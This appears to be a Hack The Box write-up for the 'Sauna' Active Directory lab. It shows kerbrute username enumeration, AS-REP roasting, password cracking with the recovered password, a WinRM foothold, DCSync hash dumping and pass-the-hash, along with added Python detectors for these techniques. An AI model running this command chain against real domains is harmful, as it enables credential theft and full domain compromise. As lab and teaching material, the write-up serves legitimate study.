Sauna | HTB Writeup

Enumeration
Enumerating Open Ports: rustscan
Rustscan, like nmap, can be used to enumerate open ports. It is faster than nmap, so it is useful for finding the open ports quickly.
$ rustscan -a 10.10.10.175
Open 10.10.10.175:53
Open 10.10.10.175:80
Open 10.10.10.175:88
Open 10.10.10.175:135
Open 10.10.10.175:139
Open 10.10.10.175:389
Open 10.10.10.175:445
Open 10.10.10.175:464
Open 10.10.10.175:593
Open 10.10.10.175:636
Open 10.10.10.175:3268
Open 10.10.10.175:3269
Open 10.10.10.175:5985
Open 10.10.10.175:9389
Nmap Scan
Now that we have the list of open ports, we can run an Nmap scan against only those ports to identify the services running on them.
$ nmap -p <list-of-open-ports> -sC -sV 10.10.10.175

DNS
Since port 53 is open, we can try a zone transfer. We can attempt two domain names, sauna.htb and egotistical-bank.local. The first is just a guess based on the box name, while the latter appears in the output of the nmap scan.
dig axfr @10.10.10.175 egotistical-bank.local
dig axfr @10.10.10.175 sauna.htb
Both zone transfer attempts fail.
RPC | Port 135
Since port 135 is open, we can try rpcinfo and rpcclient with a blank username. That fails too.

LDAP | Port 389, Port 636
Ports 389 and 636 (LDAP and LDAPS) are open, so we can query LDAP. Multiple tools can do this; let's attempt to enumerate the domain using ldapsearch.
From the output, we can note that the domain name is egotistical-bank.local, because DC=EGOTISTICAL-BANK,DC=LOCAL is returned as a naming context.
$ ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
ldapsearch -x -H ldap://10.10.10.175 -w '' -D '' -b 'DC=egotistical-bank,DC=local'

However, ldapsearch was not much help here: the anonymous bind above did not return a list of valid users.
Kerberos
Since port 88 is also open, we can use a command-line utility such as kerbrute to brute-force usernames. I'm using the xato-net-10-million-usernames.txt wordlist to brute-force the usernames.
kerbrute userenum -d egotistical-bank.local --dc 10.10.10.175 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
2025/01/13 19:21:01 > [+] VALID USERNAME: hsmith@egotistical-bank.local
2025/01/13 19:21:47 > [+] VALID USERNAME: Administrator@egotistical-bank.local
2025/01/13 19:24:34 > [+] VALID USERNAME: fsmith@egotistical-bank.local
AS-REP Roasting
If Kerberos pre-authentication is disabled for an account, we can use the enumerated usernames with the impacket-GetNPUsers utility to request AS-REP hashes for those users.
From the screenshot below, we can observe that the hash of the fsmith user is returned (the hashcat output further down shows the same principal).
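The two Kerberos techniques above (username enumeration and AS-REP roasting) leave traces a defender can check for. The following is an added example, not code from the original writeup: it runs three checks over constructed directory entries and Security-log 4768 events (field names follow the Windows event; the values and IP addresses are illustrative, not taken from the box).

```python
from collections import Counter

UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit that makes an account AS-REP roastable
RC4_HMAC = "0x17"                    # etype 23, the "$krb5asrep$23$" prefix hashcat reports
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"  # 4768 failure code for a user that does not exist


def roastable_accounts(entries):
    """sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set (the audit fix: clear it)."""
    return sorted(e["sAMAccountName"] for e in entries
                  if e["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)


def asrep_roast_requests(events):
    """4768 TGT requests that succeeded with no pre-authentication and asked for RC4."""
    return [e["TargetUserName"] for e in events
            if e["EventID"] == 4768 and e["Status"] == "0x0"
            and e["PreAuthType"] == "0" and e["TicketEncryptionType"] == RC4_HMAC]


def username_enum_sources(events, threshold=3):
    """Client IPs with at least `threshold` unknown-principal failures: kerbrute-style enumeration."""
    hits = Counter(e["IpAddress"] for e in events
                   if e["EventID"] == 4768 and e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return sorted(ip for ip, n in hits.items() if n >= threshold)


# Constructed directory entries (0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD; illustrative values).
LDAP_ENTRIES = [
    {"sAMAccountName": "fsmith", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "hsmith", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc_loanmgr", "userAccountControl": 0x10200},
]

# Constructed 4768 events: three guesses at non-existent users from one client, then one
# pre-auth-less RC4 request for fsmith, then a normal pre-authenticated AES request.
EVENTS = [
    {"EventID": 4768, "TargetUserName": "bob", "Status": "0x6", "IpAddress": "::ffff:10.10.14.5", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"EventID": 4768, "TargetUserName": "alice", "Status": "0x6", "IpAddress": "::ffff:10.10.14.5", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"EventID": 4768, "TargetUserName": "carol", "Status": "0x6", "IpAddress": "::ffff:10.10.14.5", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"EventID": 4768, "TargetUserName": "fsmith", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "hsmith", "Status": "0x0", "IpAddress": "::ffff:10.10.14.9", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
]

if __name__ == "__main__":
    print("AS-REP roastable accounts:", roastable_accounts(LDAP_ENTRIES))
    print("roast-style TGT requests:", asrep_roast_requests(EVENTS))
    print("enumeration sources:", username_enum_sources(EVENTS))
```

A burst of 0x6 failures only stands out against a baseline, so tune the threshold to the window you evaluate it over.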

Bruteforce the hash
Save the entire hash in a file named hash and run hashcat with only that file as the argument.
hashcat hash
This is useful because hashcat auto-detects the hash type and tells you which mode (-m) is required to crack it.

Crack the hash
Once we know the mode, we can crack the hash using the following command. Note that mode 18200 is the value reported by the previous command.
$ hashcat hash -m 18200 /usr/share/wordlists/rockyou.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:dc38309ec9ddcbf4790857a919ff9e11$...:Thestrokes23
Initial Foothold
WinRM | Port 5985
Now that we have the user's credentials, we can use the evil-winrm utility to log in as fsmith. We use evil-winrm because the WinRM service is listening on port 5985.
$ evil-winrm -i egotistical-bank.local -u fsmith -p Thestrokes23
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type users.txt
72703c7efae9f3fcc57fe0c661c997db
Post Exploitation
Once inside, we can upload winpeas.exe to enumerate the box. There are multiple ways to transfer a file from a Linux machine to a Windows box. For the sake of learning, I'm going with first creating an SMB server.
Note: Make sure that the directory in which you are executing the impacket-smbserver command contains the winpeas.exe file.
# Attacker machine
impacket-smbserver -smb2support temp .
# Victim
*Evil-WinRM* PS C:\Users\FSmith\Documents> net use \\<attacker-ip>\temp
*Evil-WinRM* PS C:\Users\FSmith\Documents> copy \\<attacker-ip>\temp\winpeas.exe winpeas.exe

Once winpeas.exe is executed, we find credentials for the svc_loanmanager user.
Bloodhound
Next, let's run BloodHound. If we expand Outbound Object Control for the svc_loanmgr user, we see that the account has DCSync permissions.

DCSync
Because of that permission, we can use secretsdump from impacket to dump the hashes of all domain users.

Once we have the Administrator hash, we can use the crackmapexec smb module to check whether it can be used to log in. A Pwn3d! response in the output means the hash is accepted and gives administrative access.
crackmapexec smb <IP> -u 'Administrator' --hash <hash>
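A DCSync run like the one above is visible to a defender as a directory-service 4662 event carrying the replication extended rights. This added example (not code from the writeup) maps those well-known right GUIDs and flags replication requests that do not come from a domain controller account; the events are constructed and the DC account name DC01$ is a placeholder.

```python
import re

# Extended-right GUIDs that grant replication (well-known Active Directory values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"                           # AccessMask for an extended-right check
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.I)  # GUIDs as they appear in the Properties field


def replication_rights_used(properties):
    """Names of the replication rights listed in a 4662 Properties field (other GUIDs ignored)."""
    return sorted(REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
                  if g.lower() in REPLICATION_RIGHTS)


def dcsync_alerts(events, dc_accounts):
    """(account, rights) for replication requests whose subject is not a known DC machine account."""
    known_dcs = {a.upper() for a in dc_accounts}
    alerts = []
    for e in events:
        if e["EventID"] != 4662 or e["AccessMask"] != CONTROL_ACCESS:
            continue
        rights = replication_rights_used(e["Properties"])
        if rights and e["SubjectUserName"].upper() not in known_dcs:
            alerts.append((e["SubjectUserName"], rights))
    return alerts


# Constructed 4662 events: legitimate DC-to-DC replication, a user account pulling all
# changes (what secretsdump needs), and an unrelated property read by the same user.
EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": "0x20",
     "Properties": "Read Property\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for account, rights in dcsync_alerts(EVENTS, ["DC01$"]):
        print(f"DCSync-style replication by {account}: {', '.join(rights)}")
```

4662 is only written when the domain object's SACL audits Control Access and "Audit Directory Service Access" is enabled, so confirm that auditing exists before relying on this rule.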

Privilege Escalation
From here, one can take multiple routes. For the sake of learning, we use psexec to log in as Administrator with the hash.
impacket-psexec -hashes <hash> -dc-ip <IP> user@IP
